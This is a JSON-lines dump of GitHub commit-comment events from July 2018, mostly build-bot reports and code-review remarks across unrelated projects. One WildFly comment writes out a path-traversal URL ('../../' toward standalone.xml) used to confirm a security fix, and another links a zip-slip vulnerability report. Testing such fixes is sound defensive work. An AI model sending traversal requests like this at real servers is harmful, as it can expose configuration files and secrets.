{"id":"7946633609","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29663555,"position":null,"line":null,"path":null,"commit_id":"da47a7b85ee4ca75564901751f89c8f2c83e8a12","created_at":"2018-07-10T22:04:12Z","updated_at":"2018-07-10T22:04:12Z","author_association":"NONE","body":"Puzzle `231-5ca94c9b` disappeared from [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java), that's why I closed #233. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T22:04:12Z"}
{"id":"7946638524","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29663573,"position":null,"line":null,"path":null,"commit_id":"99a9af7293ff90a2503b0f345af83718b63c909e","created_at":"2018-07-10T22:05:24Z","updated_at":"2018-07-10T22:05:24Z","author_association":"CONTRIBUTOR","body":"Does this hide the seed information? Now when allowing the automatically generated seed it is not printed to the standard output."}},"created_at":"2018-07-10T22:05:24Z"}
{"id":"7946642270","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29663577,"position":null,"line":null,"path":null,"commit_id":"0b4c8d2b8efc4ea0eaad91c41aa39f0bcb48bada","created_at":"2018-07-10T22:06:20Z","updated_at":"2018-07-10T22:06:20Z","author_association":"COLLABORATOR","body":"<h3>upgradeto TypeScript 2.8 (#2665)</h3>\n\nPreview: <strong><a href='https://18195-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18195-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18195-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T22:06:20Z"}
{"id":"7946646959","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29663590,"position":21,"line":435,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-10T22:07:37Z","updated_at":"2018-07-10T22:07:37Z","author_association":"NONE","body":"Some javadoc would be useful here. It's not entirely clear that this is doing the right thing... "}},"created_at":"2018-07-10T22:07:37Z"}
{"id":"7946650821","type":"CommitCommentEvent","actor":{"login":"familyarcangel12"},"repo":{"name":"iMeiji/shadowsocks_install"},"payload":{"comment":{"id":29663601,"position":4,"line":13,"path":"README.md","commit_id":"242765df08bad13005816bb4ea9ff812dfe7f66f","created_at":"2018-07-10T22:08:35Z","updated_at":"2018-07-10T22:08:35Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-10T22:08:35Z"}
{"id":"7946655250","type":"CommitCommentEvent","actor":{"login":"SveSop"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29663607,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-10T22:09:42Z","updated_at":"2018-07-10T22:09:42Z","author_association":"NONE","body":"Incase someone is struggling with Ubuntu 14.04, i found a PPA containing a relatively recent ffmpeg version:\r\n[https://launchpad.net/~jonathonf/+archive/ubuntu/ffmpeg-3](https://launchpad.net/~jonathonf/+archive/ubuntu/ffmpeg-3)\r\n\r\nRemains to be seen if it goes tits up in use, but configure and compile seemed happy enough...\r\n\r\nPS. Ubuntu atleast seem to use the path `/usr/include/x86_64-linux-gnu/libavcodec/avcodec.h`"}},"created_at":"2018-07-10T22:09:42Z"}
{"id":"7946655993","type":"CommitCommentEvent","actor":{"login":"GS-SISTEMAS"},"repo":{"name":"andyveraGS/wms"},"payload":{"comment":{"id":29663611,"position":null,"line":null,"path":null,"commit_id":"abd5d7e5ede1958adedb138c9562371793b4ebd7","created_at":"2018-07-10T22:09:54Z","updated_at":"2018-07-10T22:09:54Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-10T22:09:54Z"}
{"id":"7946675674","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"fjuma/wildfly"},"payload":{"comment":{"id":29663646,"position":54,"line":391,"path":"undertow/src/main/java/org/wildfly/extension/undertow/Host.java","commit_id":"8b27aeb1eec9168b8dfdad845c51458b468858ac","created_at":"2018-07-10T22:15:01Z","updated_at":"2018-07-10T22:15:01Z","author_association":"OWNER","body":"Attempting to access http://localhost:8080/.well-known/acme-challenge/../../standalone/configuration/standalone.xml results in a 404 - Not Found error.\r\n\r\nTo be safe, I've also updated ```AcmeResourceHandler#handleRequest``` to make use of a regular expression (\"/\\\\.well-known/acme-challenge/[A-Za-z0-9_-]+\") in order to match only valid .well-known URLs."}},"created_at":"2018-07-10T22:15:01Z"}
{"id":"7946676481","type":"CommitCommentEvent","actor":{"login":"bmanojlovic"},"repo":{"name":"sinokylin/terraform-provider-ovirt"},"payload":{"comment":{"id":29663650,"position":9,"line":144,"path":"ovirt/resource_ovirt_vm.go","commit_id":"e66b968d09705aab7c13a3c9d3ee0d458f7ef26d","created_at":"2018-07-10T22:15:13Z","updated_at":"2018-07-10T22:15:13Z","author_association":"NONE","body":"Regarding this what i tried to do (and failing for some reason) is to add multiple network adapter configurations to initial configuration and it does not work as it still adds just last one instead multiple configurations\r\nis it possible problem in ovirtsdk handling?"}},"created_at":"2018-07-10T22:15:13Z"}
{"id":"7946678918","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29663655,"position":51,"line":51,"path":"elytron/src/main/java/org/wildfly/extension/elytron/WildFlyAcmeClient.java","commit_id":"50f6e936314d359cef1e41309e476bc118c20415","created_at":"2018-07-10T22:15:51Z","updated_at":"2018-07-10T22:15:51Z","author_association":"OWNER","body":"I've updated this to first validate the value of ```selectedChallenge.getToken()``` to make sure it only matches [A-Za-z0-9_-]+. This will ensure that we only try to write to a valid file."}},"created_at":"2018-07-10T22:15:51Z"}
{"id":"7946679796","type":"CommitCommentEvent","actor":{"login":"boring10"},"repo":{"name":"boring10/Information-System"},"payload":{"comment":{"id":29663660,"position":null,"line":null,"path":null,"commit_id":"572d73aaa8680fb7b9b43252ff35fb8db5e5b50c","created_at":"2018-07-10T22:16:05Z","updated_at":"2018-07-10T22:16:05Z","author_association":"OWNER","body":"The filename change requires that the branch 'master' be merged."}},"created_at":"2018-07-10T22:16:05Z"}
{"id":"7946681125","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29663665,"position":62,"line":62,"path":"elytron/src/main/java/org/wildfly/extension/elytron/WildFlyAcmeClient.java","commit_id":"50f6e936314d359cef1e41309e476bc118c20415","created_at":"2018-07-10T22:16:25Z","updated_at":"2018-07-10T22:16:25Z","author_association":"OWNER","body":"I've also updated this to first validate the value of ```challenge.getToken()``` to make sure it matches [A-Za-z0-9_-]+. This will ensure that we only try to remove a valid file."}},"created_at":"2018-07-10T22:16:25Z"}
{"id":"7946682123","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29663667,"position":null,"line":null,"path":null,"commit_id":"00e92007b92d9efc7b8702b75e7d85c5f1c95c06","created_at":"2018-07-10T22:16:42Z","updated_at":"2018-07-10T22:16:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-329](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-329).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-329-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T22:16:42Z"}
{"id":"7946685448","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29663672,"position":null,"line":null,"path":null,"commit_id":"8b24e44c54dff219cf0cd3abf6c268011d9c2834","created_at":"2018-07-10T22:17:35Z","updated_at":"2018-07-10T22:17:35Z","author_association":"OWNER","body":"Build version: __`2.0.2-feat-sourcemaps.25`__ :crossed_fingers: [`feat-sourcemaps`](https://github.com/streamich/nano-css/tree/feat-sourcemaps) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/25) :tada:"}},"created_at":"2018-07-10T22:17:35Z"}
{"id":"7946685678","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29663673,"position":49,"line":465,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-10T22:17:38Z","updated_at":"2018-07-10T22:17:38Z","author_association":"NONE","body":"According to the Javadoc spec the method getNamespaceCount() is only valid for START_ELEMENT, END_ELEMENT and NAMESPACE elements. Otherwise it must throw an IllegalStateException.\r\n\r\nFor END_ELEMENT it is the number of namespaces that are about to go out of scope (because they were declared on the corresponding START_ELEMENT). \r\n\r\nSomething like:\r\n`if (eventType == XMLEvent.START_ELEMENT || eventType == XMLEvent.END_ELEMENT || eventType == XMLEvent.NAMESPACE)\r\n return getNamespaceDeclarations().size();\r\nelse\r\n  throw new IllegalStateException(\"Current event state is \" + XMLEventTypeToString(eventType)\r\n                    + \" is not among the states \" + XMLEventTypeToString(XMLEvent.START_ELEMENT)\r\n                    + \", \" + XMLEventTypeToString(XMLEvent.END_ELEMENT) + \", \"\r\n                    + XMLEventTypeToString(XMLEvent.NAMESPACE)\r\n                    + \" valid for getNamespaceCount().\");\r\n`"}},"created_at":"2018-07-10T22:17:38Z"}
{"id":"7946686077","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663676,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-10T22:17:45Z","updated_at":"2018-07-10T22:17:45Z","author_association":"NONE","body":"issue_6729 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T22:17:45Z"}
{"id":"7946689431","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29663683,"position":2,"line":2,"path":"docs/logs/kibana.md","commit_id":"7ae60894469008b1469d8f82c0d160d692706174","created_at":"2018-07-10T22:18:42Z","updated_at":"2018-07-10T22:18:42Z","author_association":"MEMBER","body":"A few typos here in this line @goranbajic .  Note that we are not pushing \"Logsene\" as the name.\r\n"}},"created_at":"2018-07-10T22:18:42Z"}
{"id":"7946700940","type":"CommitCommentEvent","actor":{"login":"ollielo"},"repo":{"name":"laristra/flecsi"},"payload":{"comment":{"id":29663703,"position":null,"line":null,"path":null,"commit_id":"2b84b152805b1dbedb30c2790d41caab0c586444","created_at":"2018-07-10T22:21:54Z","updated_at":"2018-07-10T22:21:54Z","author_association":"CONTRIBUTOR","body":"@jlippuner \r\n\r\nI am also working flecsi/execution/mpi/task_epilog.h and I am trying to merge your branch to mine but there are merge conflicts. Did you actually made any material change to that file or just some reformating?"}},"created_at":"2018-07-10T22:21:54Z"}
{"id":"7946704378","type":"CommitCommentEvent","actor":{"login":"Jazzamudio"},"repo":{"name":"samuraycats/JardineriaGallaga"},"payload":{"comment":{"id":29663710,"position":null,"line":null,"path":null,"commit_id":"556302a1bf345410ffa5bd19e0a34453100a2397","created_at":"2018-07-10T22:22:50Z","updated_at":"2018-07-10T22:22:50Z","author_association":"COLLABORATOR","body":"enviado"}},"created_at":"2018-07-10T22:22:50Z"}
{"id":"7946706905","type":"CommitCommentEvent","actor":{"login":"benoitsevres"},"repo":{"name":"benoitsevres/l-equipe-de-kto"},"payload":{"comment":{"id":29663713,"position":14,"line":14,"path":"1777dddd","commit_id":"1a26f82ea7ff4f4796e400a22563844cde778a87","created_at":"2018-07-10T22:23:33Z","updated_at":"2018-07-10T22:23:33Z","author_association":"OWNER","body":"line 14 eeeeeeeeeee44444444"}},"created_at":"2018-07-10T22:23:33Z"}
{"id":"7946707121","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29663715,"position":null,"line":null,"path":null,"commit_id":"e2ec74ac2ac3d14b61b3aa921c024622ea83c7f3","created_at":"2018-07-10T22:23:36Z","updated_at":"2018-07-10T22:23:36Z","author_association":"COLLABORATOR","body":"<h3>[Button] fix loading spinner size (#2666)</h3>\n\nPreview: <strong><a href='https://18203-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18203-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18203-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T22:23:36Z"}
{"id":"7946710116","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29663720,"position":null,"line":null,"path":null,"commit_id":"944985fef450b8ad89dd072c4de3d2824a270f70","created_at":"2018-07-10T22:24:24Z","updated_at":"2018-07-10T22:24:24Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-39](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-39).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-39-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T22:24:24Z"}
{"id":"7946728501","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29663764,"position":59,"line":477,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-10T22:29:39Z","updated_at":"2018-07-10T22:29:39Z","author_association":"NONE","body":"According to Javadoc the EXIBodyDecoder.getDeclaredPrefixDeclarations() method can return null. This means the getNamespaceDeclaration() method can return null. This code is a NullPointerException waiting to happen...\r\n\r\nRather than returning null perhaps the getNamespaceDeclarations() method can return the empty list:\r\n\r\n```\r\npublic List<NamespaceDeclaration> getNamespaceDeclarations() {\r\n ...\r\n List<NamespaceDeclaration> result = decoder.getDeclaredPrefixDeclarations();\r\n return result != null ? result : Collections.emptyList();\r\n}\r\n```\r\n\r\nThis way all callers to this method would not have to check for null or risk NPE."}},"created_at":"2018-07-10T22:29:39Z"}
{"id":"7946734930","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29663788,"position":null,"line":null,"path":null,"commit_id":"dfd6d5271339429fa03db80a3dea44f580af0031","created_at":"2018-07-10T22:31:25Z","updated_at":"2018-07-10T22:31:25Z","author_association":"OWNER","body":"Build version: __`2.0.2-feat-sourcemaps.26`__ :crossed_fingers: [`feat-sourcemaps`](https://github.com/streamich/nano-css/tree/feat-sourcemaps) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/26) :tada:"}},"created_at":"2018-07-10T22:31:25Z"}
{"id":"7946738630","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29663795,"position":34,"line":300,"path":"src/test/java/com/siemens/ct/exi/main/api/stream/StAXCoderTestCase.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-10T22:32:31Z","updated_at":"2018-07-10T22:32:31Z","author_association":"NONE","body":"You might take a look at the comment above. There's a difference between the namespace Count (the # namespaces being introduced or about to go out of scope) and the number of namespace prefixes that have been declared for an end element."}},"created_at":"2018-07-10T22:32:31Z"}
{"id":"7946739538","type":"CommitCommentEvent","actor":{"login":"abirmoneim"},"repo":{"name":"udacity/course-collaboration-travel-plans"},"payload":{"comment":{"id":29663797,"position":16,"line":16,"path":"css/app.css","commit_id":"5e9b2018d2e30bf8d278489f08e62339b0d04f91","created_at":"2018-07-10T22:32:47Z","updated_at":"2018-07-10T22:32:47Z","author_association":"NONE","body":"    padding:20px;"}},"created_at":"2018-07-10T22:32:47Z"}
{"id":"7946739914","type":"CommitCommentEvent","actor":{"login":"thypon"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29663799,"position":6,"line":6,"path":"srcpkgs/mbox/template","commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T22:32:53Z","updated_at":"2018-07-10T22:32:53Z","author_association":"MEMBER","body":"yep\r\n"}},"created_at":"2018-07-10T22:32:53Z"}
{"id":"7946743506","type":"CommitCommentEvent","actor":{"login":"thypon"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29663811,"position":15,"line":15,"path":"srcpkgs/mbox/template","commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T22:33:57Z","updated_at":"2018-07-10T22:33:57Z","author_association":"MEMBER","body":"yep there are. It uses ptrace register tracking, it is pretty unstable even on x86_64, it does not even work on every other architecture.\r\n\r\nIt's not even compiling on musl."}},"created_at":"2018-07-10T22:33:57Z"}
{"id":"7946746371","type":"CommitCommentEvent","actor":{"login":"eskema"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29663817,"position":null,"line":null,"path":null,"commit_id":"725de22ea3aa90236b21c343be460109716a0ba1","created_at":"2018-07-10T22:34:50Z","updated_at":"2018-07-10T22:34:50Z","author_association":"NONE","body":"I'm getting some issues with this commit. Attributes already saved are not updated, you need to update the page attribute for it to display correctly. On a site with 8.3.2, entering on a page attributes tab results in Rich Text attributes to become blank. I'm still investigating if something else might be interfering, but I was still able to get to a previous version before the edit and restore the values. Trying again ends with the same results."}},"created_at":"2018-07-10T22:34:50Z"}
{"id":"7946747139","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29663820,"position":null,"line":null,"path":null,"commit_id":"e2361d05389f990892a20fdf411cca1dc1e44240","created_at":"2018-07-10T22:35:03Z","updated_at":"2018-07-10T22:35:03Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-04/2/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : org.jenkinsci.plugins.workflow.steps.FlowInterruptedException\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-04/2//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/e2361d05389f990892a20fdf411cca1dc1e44240/2/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/e2361d05389f990892a20fdf411cca1dc1e44240/2/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-04/e2361d05389f990892a20fdf411cca1dc1e44240/2/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-04/2//console) 🔥\n"}},"created_at":"2018-07-10T22:35:03Z"}
{"id":"7946747594","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jclouds/jclouds"},"payload":{"comment":{"id":29663823,"position":null,"line":null,"path":null,"commit_id":"c34935dcd3476db7397e7433de6243ec81a09ccf","created_at":"2018-07-10T22:35:11Z","updated_at":"2018-07-10T22:35:11Z","author_association":"CONTRIBUTOR","body":"#1228 FTR"}},"created_at":"2018-07-10T22:35:11Z"}
{"id":"7946751469","type":"CommitCommentEvent","actor":{"login":"dubslow"},"repo":{"name":"LeelaChessZero/lc0"},"payload":{"comment":{"id":29663829,"position":293,"line":146,"path":"src/mcts/node.cc","commit_id":"c7e15bcaa584729507dc6b8707e25d4a71ea791c","created_at":"2018-07-10T22:36:18Z","updated_at":"2018-07-10T22:36:18Z","author_association":"MEMBER","body":"Isn't `n_` different from `GetNStarted`? (Shouldn't it be `n_ + n_in_flight_`?)"}},"created_at":"2018-07-10T22:36:18Z"}
{"id":"7946757989","type":"CommitCommentEvent","actor":{"login":"biodavis"},"repo":{"name":"biodavis/website"},"payload":{"comment":{"id":29663847,"position":1,"line":1,"path":"README.md","commit_id":"4817d1fedae977c67b99486388856fee9a029d43","created_at":"2018-07-10T22:38:12Z","updated_at":"2018-07-10T22:38:12Z","author_association":"OWNER","body":"really can do this?"}},"created_at":"2018-07-10T22:38:12Z"}
{"id":"7946758857","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663848,"position":null,"line":null,"path":null,"commit_id":"86b95408fdd8b8131ad2d8064a71a01920c1db2c","created_at":"2018-07-10T22:38:29Z","updated_at":"2018-07-10T22:38:29Z","author_association":"NONE","body":"fix_restrictive_cli (mbadams5) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T22:38:29Z"}
{"id":"7946769125","type":"CommitCommentEvent","actor":{"login":"aembler"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29663873,"position":null,"line":null,"path":null,"commit_id":"725de22ea3aa90236b21c343be460109716a0ba1","created_at":"2018-07-10T22:41:41Z","updated_at":"2018-07-10T22:41:41Z","author_association":"MEMBER","body":"1. True – this will not update anything that has previously been entered with the editor, because those links were not passed through the link abstractor.\r\n\r\n2. I'm not sure how this commit affects version 8.3.2 ..?"}},"created_at":"2018-07-10T22:41:41Z"}
{"id":"7946769668","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29663874,"position":null,"line":null,"path":null,"commit_id":"93910ad57ca4a3b4456a05b1b41bb1aba5f7bb92","created_at":"2018-07-10T22:41:50Z","updated_at":"2018-07-10T22:41:50Z","author_association":"CONTRIBUTOR","body":"@lukehutch have you seen this already? https://snyk.io/research/zip-slip-vulnerability"}},"created_at":"2018-07-10T22:41:50Z"}
{"id":"7946770645","type":"CommitCommentEvent","actor":{"login":"dartraiden"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29663875,"position":6,"line":344,"path":"libs/liblua/src/lstate.c","commit_id":"dae1e12d0bc0be3b6c243dc624b30e1ed3b07410","created_at":"2018-07-10T22:42:10Z","updated_at":"2018-07-10T22:42:10Z","author_association":"MEMBER","body":"Это нужно вернуть, потому что это был фикс против падения 4d993e1eaaca9cfa1c860aadb75caf8a9df5860d"}},"created_at":"2018-07-10T22:42:10Z"}
{"id":"7946772088","type":"CommitCommentEvent","actor":{"login":"iparask"},"repo":{"name":"radical-cybertools/radical.pilot"},"payload":{"comment":{"id":29663877,"position":26,"line":759,"path":"src/radical/pilot/pmgr/launching/default.py","commit_id":"29c62012c338c3d5e6bf788b60b0955f62a20533","created_at":"2018-07-10T22:42:35Z","updated_at":"2018-07-10T22:42:35Z","author_association":"CONTRIBUTOR","body":"This line is the one that triggers #1659 more in the ticket"}},"created_at":"2018-07-10T22:42:35Z"}
{"id":"7946782047","type":"CommitCommentEvent","actor":{"login":"Earthcomputer"},"repo":{"name":"Earthcomputer/clientcommands"},"payload":{"comment":{"id":29663902,"position":null,"line":null,"path":null,"commit_id":"63da695922120cf17821ba0dc8c9c8178d9b4e10","created_at":"2018-07-10T22:45:39Z","updated_at":"2018-07-10T22:45:39Z","author_association":"OWNER","body":"It was buggy and will be replaced by a more powerful command anyway."}},"created_at":"2018-07-10T22:45:39Z"}
{"id":"7946783001","type":"CommitCommentEvent","actor":{"login":"dartraiden"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29663907,"position":6,"line":344,"path":"libs/liblua/src/lstate.c","commit_id":"dae1e12d0bc0be3b6c243dc624b30e1ed3b07410","created_at":"2018-07-10T22:45:55Z","updated_at":"2018-07-10T22:45:55Z","author_association":"MEMBER","body":"Вернул."}},"created_at":"2018-07-10T22:45:55Z"}
{"id":"7946783718","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663909,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T22:46:07Z","updated_at":"2018-07-10T22:46:07Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-10T22:46:07Z"}
{"id":"7946788324","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663924,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T22:47:27Z","updated_at":"2018-07-10T22:47:27Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T22:47:27Z"}
{"id":"7946791322","type":"CommitCommentEvent","actor":{"login":"jlippuner"},"repo":{"name":"laristra/flecsi"},"payload":{"comment":{"id":29663937,"position":null,"line":null,"path":null,"commit_id":"2b84b152805b1dbedb30c2790d41caab0c586444","created_at":"2018-07-10T22:48:17Z","updated_at":"2018-07-10T22:48:17Z","author_association":"MEMBER","body":"The only material change besides bringing the file in line with the .clang-format file in the flecsi root directory is line 288 (old) and lines 247 - 250 (new), which is my quick and dirty fix of #429"}},"created_at":"2018-07-10T22:48:17Z"}
{"id":"7946792704","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29663939,"position":null,"line":null,"path":null,"commit_id":"14bda9b09c2689aaf9c35b5fc66403d7daef45f6","created_at":"2018-07-10T22:48:42Z","updated_at":"2018-07-10T22:48:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make a strike through the word when clicked on and toggle completion](https://trello.com/c/47qiQUTT/7-make-a-strike-through-the-word-when-clicked-on-and-toggle-completion)"}},"created_at":"2018-07-10T22:48:42Z"}
{"id":"7946795955","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29663944,"position":null,"line":null,"path":null,"commit_id":"d16ff3bd8b92fa84a9007bf5ebedd8153e4c089d","created_at":"2018-07-10T22:49:43Z","updated_at":"2018-07-10T22:49:43Z","author_association":"COLLABORATOR","body":"RN now builds fine with gradle@3 so we could land this again."}},"created_at":"2018-07-10T22:49:43Z"}
